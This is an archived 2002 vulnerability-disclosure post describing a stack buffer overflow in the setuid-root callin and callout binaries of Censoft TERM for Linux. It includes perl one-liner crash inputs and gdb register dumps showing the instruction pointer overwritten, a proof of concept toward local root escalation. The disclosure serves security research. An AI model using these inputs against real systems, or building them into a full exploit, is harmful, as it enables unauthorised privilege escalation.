Vulnerability Development mailing list archives
Censoft TERM Emu bOf
From: KF <dotslash () snosoft com>
Date: Fri, 22 Feb 2002 13:16:18 -0500
Vendor: www.censoft.com Product: TERM for UNIX / Linux Emulations Wyse 60, SCO ANSI, VT220 Terminal Supports SCO, AIX, HP, DEC, Solaris Operating Environment[tm] software, and Linux[tm] I WAS going to purchase this product after trying the eval however I changed my mind for some reason...I would Imagine the full product is also vulnerable [elguapo@linux elguapo]$ ftp ftp.censoft.com Connected to ftp.censoft.com. 220 ns.centurysoftware.com FTP server (Version 6.00) ready. Name (ftp.censoft.com:elguapo): anonymous 331 Guest login ok, send your email address as password. Password: 230- Welcome To Century Software Ftp Server. 230- 230- Here you will find all the Century Software 230- Products. 230- ... ftp> cd download/windows/linux 250 CWD command successful. ftp> get termlx.tar local: termlx.tar remote: termlx.tar 200 PORT command successful. 150 Opening BINARY mode data connection for 'termlx.tar' (931840 bytes). 226 Transfer complete. As you can see the .tar file has some suid root stuff to play with [elguapo@linux elguapo]$ tar tvf termlx.tar -rwxr-xr-x root/root 630976 2000-04-01 02:00:00 term -rwsr-xr-x root/root 96988 1999-03-22 23:52:10 callin -rwsr-xr-x root/root 97144 1999-03-22 23:52:11 callout -rwxr-xr-x root/root 94484 1999-03-22 23:52:10 brand Aparantly I don't play nice [elguapo@linux elguapo]$ /home/elguapo/Censoft/callin `perl -e 'print "A" x 9000'` Arguments must be of form ttyNN [elguapo@linux elguapo]$ /home/elguapo/Censoft/callin tty`perl -e 'print "A" x 9000'` Segmentation fault (core dumped) rm /etc/LCK..inittab if you need to try again or you will get the following message Non-expired lockfile: /etc/LCK..inittab Lets check the stack out a bit. [root@linux /root]# gdb /home/elguapo/Censoft/callin core GNU gdb 5.0mdk-11mdk Linux-Mandrake 8.0 Core was generated by `BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB'. Program terminated with signal 11, Segmentation fault. #0 0x42424242 in ?? () (gdb) i r eax 0xffffffff -1 ecx 0xbfffd3a4 -1073753180 edx 0x1 1 ebx 0x805fdf0 134610416 esp 0xbfffd3ec 0xbfffd3ec ebp 0x42424242 0x42424242 esi 0xbfffd400 -1073753088 edi 0xbfffd858 -1073751976 eip 0x42424242 0x42424242 the callout binary is also affected. [root@linux /root]# /home/elguapo/Censoft/callout tty`perl -e 'print "B" x 9000'` Segmentation fault (core dumped) [root@linux /root]# gdb /home/elguapo/Censoft/callout core GNU gdb 5.0mdk-11mdk Linux-Mandrake 8.0 Core was generated by `BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB'. Program terminated with signal 11, Segmentation fault. #0 0x42424242 in ?? () (gdb) i r eax 0xffffffff -1 ecx 0xbfffd3a4 -1073753180 edx 0x1 1 ebx 0x805fe88 134610568 esp 0xbfffd3ec 0xbfffd3ec ebp 0x42424242 0x42424242 esi 0xbfffd400 -1073753088 edi 0xbfffd856 -1073751978 eip 0x42424242 0x42424242 -KF
Current thread:
- Censoft TERM Emu bOf KF (Feb 22)